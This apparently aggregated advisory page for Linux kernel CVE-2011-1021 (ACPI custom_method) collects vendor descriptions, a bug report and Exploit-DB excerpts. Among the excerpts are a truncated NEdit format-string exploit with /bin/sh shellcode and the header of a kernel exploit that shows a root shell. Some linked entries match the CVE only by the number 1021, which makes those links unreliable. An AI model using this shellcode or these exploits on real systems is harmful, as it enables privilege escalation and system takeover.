CVE-2011-1021
published 2012-06-21CVE-2011-1021: drivers/acpi/debugfs.c in the Linux kernel before 3.0 allows local users to modify arbitrary kernel memory locations by leveraging root privileges to write to…
PriorityP421low3.6CVSS 2.0
AVLACLAuNCNIPAP
EXPLOIT
EPSS
0.93%
56.1th percentile
drivers/acpi/debugfs.c in the Linux kernel before 3.0 allows local users to modify arbitrary kernel memory locations by leveraging root privileges to write to the /sys/kernel/debug/acpi/custom_method file. NOTE: this vulnerability exists because of an incomplete fix for CVE-2010-4347.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| linux | linux_kernel | <= 2.6.9 | — |
| linux | linux_kernel | — | — |
| linux | linux_kernel | >= 0 < 3.11.0-12.19 | 3.11.0-12.19 |
CVSS provenance
nvdv2.03.6LOWAV:L/AC:L/Au:N/C:N/I:P/A:P
osv6.9MEDIUM
vendor_redhat6.9MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Red Hat
kernel: /sys/kernel/debug/acpi/custom_method can bypass module restrictions
vendor_redhat·2011-02-22·CVSS 6.9
CVE-2011-1021 [MEDIUM] kernel: /sys/kernel/debug/acpi/custom_method can bypass module restrictions
kernel: /sys/kernel/debug/acpi/custom_method can bypass module restrictions
drivers/acpi/debugfs.c in the Linux kernel before 3.0 allows local users to modify arbitrary kernel memory locations by leveraging root privileges to write to the /sys/kernel/debug/acpi/custom_method file. NOTE: this vulnerability exists because of an incomplete fix for CVE-2010-4347.
Statement: The version of Linux kernel as shipped with Red Hat Enterprise Linux 4, 5, and 6 as they did not include upstream commit a1a541d8 and a25ee920 that introduced the problem. This has been addressed in Red Hat Enterprise MRG via https://rhn.redhat.com/errata/RHSA-2011-1253.html.
Notes:
This requires debugfs to be mounted on a local system in order to have access
to the custom_method file. Debugfs is not mounted by default. Y
GHSA
GHSA-42f2-xvqw-p5x2: drivers/acpi/debugfs
ghsa_unreviewed·2022-05-17·CVSS 6.9
CVE-2011-1021 [MEDIUM] GHSA-42f2-xvqw-p5x2: drivers/acpi/debugfs
drivers/acpi/debugfs.c in the Linux kernel before 3.0 allows local users to modify arbitrary kernel memory locations by leveraging root privileges to write to the /sys/kernel/debug/acpi/custom_method file. NOTE: this vulnerability exists because of an incomplete fix for CVE-2010-4347.
OSV
CVE-2011-1021: drivers/acpi/debugfs
osv·2012-06-21·CVSS 6.9
CVE-2011-1021 [MEDIUM] CVE-2011-1021: drivers/acpi/debugfs
drivers/acpi/debugfs.c in the Linux kernel before 3.0 allows local users to modify arbitrary kernel memory locations by leveraging root privileges to write to the /sys/kernel/debug/acpi/custom_method file. NOTE: this vulnerability exists because of an incomplete fix for CVE-2010-4347.
No detection rules found.
Exploit-DB
Apache Struts - Multiple Persistent Cross-Site Scripting Vulnerabilities
exploitdb·2012-02-02
CVE-2012-1007 Apache Struts - Multiple Persistent Cross-Site Scripting Vulnerabilities
Apache Struts - Multiple Persistent Cross-Site Scripting Vulnerabilities
---
##############################################################################
#
# Title : Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities
# Author : Antu Sanadi SecPod Technologies (www.secpod.com)
# Vendor : http://struts.apache.org/
# Advisory : http://secpod.org/blog/?p=450
# http://secpod.org/advisories/SecPod_Apache_Struts_Multiple_Parsistant_XSS_Vulns.txt
# Software : Apache struts 1.3.10, 2.0.14 and 2.2.3
# Date : 01/02/2012
#
##############################################################################
SecPod ID: 1021 21/07/2011 Issue Discovered
03/08/2011 Vendor Notified
No Response
01/02/2012 Advisory Released
Class: Cross-Site Scripting (Persistence) Severity: High
Overvie
Exploit-DB
IBM Websphere Application Server 7.0.0.13 - Cross-Site Request Forgery
exploitdb·2011-06-15·CVSS 6.8
CVE-2010-3271 [MEDIUM] IBM Websphere Application Server 7.0.0.13 - Cross-Site Request Forgery
IBM Websphere Application Server 7.0.0.13 - Cross-Site Request Forgery
---
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://corelabs.coresecurity.com/
IBM WebSphere Application Server Cross-Site Request Forgery
1. *Advisory Information*
Title: IBM WebSphere Application Server Cross-Site Request Forgery
Advisory ID: CORE-2010-1021
Advisory URL: http://www.coresecurity.com/content/IBM-WebSphere-CSRF
Date published: 2011-06-15
Date of last update: 2011-06-15
Vendors contacted: IBM
Release mode: User release
2. *Vulnerability Information*
Class: Cross-Site Request Forgery (CSRF) [CWE-352]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2010-3271
3. *Vulnerability Description*
WebSphere is IBM
Exploit-DB
NEdit 5.5 - Format String
exploitdb·2011-04-14
NEdit 5.5 - Format String
NEdit 5.5 - Format String
---
# Exploit Title: Format string vulnerability in Nedit <= 5.5.
# Date: 04/13/2011
# Author: Tosh (The bug was already patched when I'd found the vuln)
# Email: [email protected]
# Patch:
http://nedit.cvs.sourceforge.net/viewvc/nedit/nedit/source/preferences.c?r1=1.159&r2=1.160&view=patch
# Version: Nedit 5.5
# Tested on: FreeBSD 8.2-RELEASE
# CVE: don't found
#!/usr/bin/perl -w
use strict;
my $exit_addr = 0x0815a86c;
my $sc =
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50".
"\x54\x53\xb0\x3b\x50\xcd\x80";
my (@payload) = ("./nedit", "-import",
pack('L',$exit_addr).pack('L',$exit_addr+1).pack('L',$exit_addr+2).pack('L',$exit_addr+3).
"%1021\$.8x-"."%1\$127x%1021\$n%1\$083x%1022\$n%1\$212x%1023\$n%1\$256x%1024\$n"
. $sc);
exec(@paylo
Exploit-DB
Linux Kernel < 2.6.37-rc2 - 'ACPI custom_method' Local Privilege Escalation
exploitdb·2010-12-18·CVSS 6.9
CVE-2011-1021 [MEDIUM] Linux Kernel < 2.6.37-rc2 - 'ACPI custom_method' Local Privilege Escalation
Linux Kernel
* http://jon.oberheide.org
*
* Information:
*
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4347
*
* This custom_method file allows to inject custom ACPI methods into the ACPI
* interpreter tables. This control file was introduced with world writeable
* permissions in Linux Kernel 2.6.33.
*
* Usage:
*
* $ gcc american-sign-language.c -o american-sign-language
* $ ./american-sign-language
* [+] resolving required symbols...
* [+] checking for world-writable custom_method...
* [+] checking for an ACPI LID device...
* [+] poisoning ACPI tables via custom_method...
* [+] triggering ACPI payload via LID device...
* [+] triggering exploit via futimesat...
* [+] launching root shell!
* # id
* uid=0(root) gid=0(root) groups=0(root)
*
* Notes:
*
* This vuln allows us to writ
arXiv
Characteristics, Root Causes, and Detection of Incomplete Security Bug Fixes in the Linux Kernel
arxiv_fulltext·2025-11-21
Characteristics, Root Causes, and Detection of Incomplete Security Bug Fixes in the Linux Kernel
Characteristics, Root Causes, and Detection of
Incomplete Security Bug Fixes in the Linux Kernel
Qiang Liu^1All work was done by Aug., 2022.,
Wenlong Zhang^1,
Muhui Jiang^2,1,
Lei Wu^1,
Yajin Zhou^1
^1Zhejiang University,
^2The Hong Kong Polytechnic University
## Abstract
Security bugs in the Linux kernel emerge endlessly and have attracted much
attention.
However, fixing security bugs in the Linux kernel could be incomplete due to
human mistakes.
Specifically, an incomplete fix fails to repair all the original security
defects in the software, fails to properly repair the original security defects,
or introduces new ones.
In this paper, we study the fixes of incomplete security bugs in the Linux
kernel for the first time, and reveal their characteristics, root causes as well
as de
Bugzilla
CVE-2011-1021 kernel: /sys/kernel/debug/acpi/custom_method can bypass module restrictions
bugzilla·2011-02-28·CVSS 6.9
CVE-2011-1021 [MEDIUM] CVE-2011-1021 kernel: /sys/kernel/debug/acpi/custom_method can bypass module restrictions
CVE-2011-1021 kernel: /sys/kernel/debug/acpi/custom_method can bypass module restrictions
Since /sys/kernel/debug/acpi/custom_method can be used to write arbitrary kernel memory (http://jon.oberheide.org/files/american-sign-language.c), it should be able to be left out of the kernel for system owners that want to be as defensive as possible to potential attacks, even from the root user. See as examples: CONFIG_DEVKMEM, CONFIG_STRICT_DEVMEM, and /proc/sys/kernel/modules_disabled.
https://lkml.org/lkml/2011/2/22/369
Discussion:
I believe this is the upstream solution
ed3aada1bf34c5a9e98af167f125f8a740fc726a
---
Statement:
The version of Linux kernel as shipped with Red Hat Enterprise Linux 4, 5, and 6 as they did not include upstream commit a1a541d8 and a25ee920 that introduced the pr
http://ftp.osuosl.org/pub/linux/kernel/v3.0/ChangeLog-3.0http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commit%3Bh=526b4af47f44148c9d665e57723ed9f86634c6e3http://www.openwall.com/lists/oss-security/2011/02/25/5https://bugzilla.redhat.com/show_bug.cgi?id=680841https://github.com/torvalds/linux/commit/526b4af47f44148c9d665e57723ed9f86634c6e3http://ftp.osuosl.org/pub/linux/kernel/v3.0/ChangeLog-3.0http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commit%3Bh=526b4af47f44148c9d665e57723ed9f86634c6e3http://www.openwall.com/lists/oss-security/2011/02/25/5https://bugzilla.redhat.com/show_bug.cgi?id=680841https://github.com/torvalds/linux/commit/526b4af47f44148c9d665e57723ed9f86634c6e3
2012-06-21
Published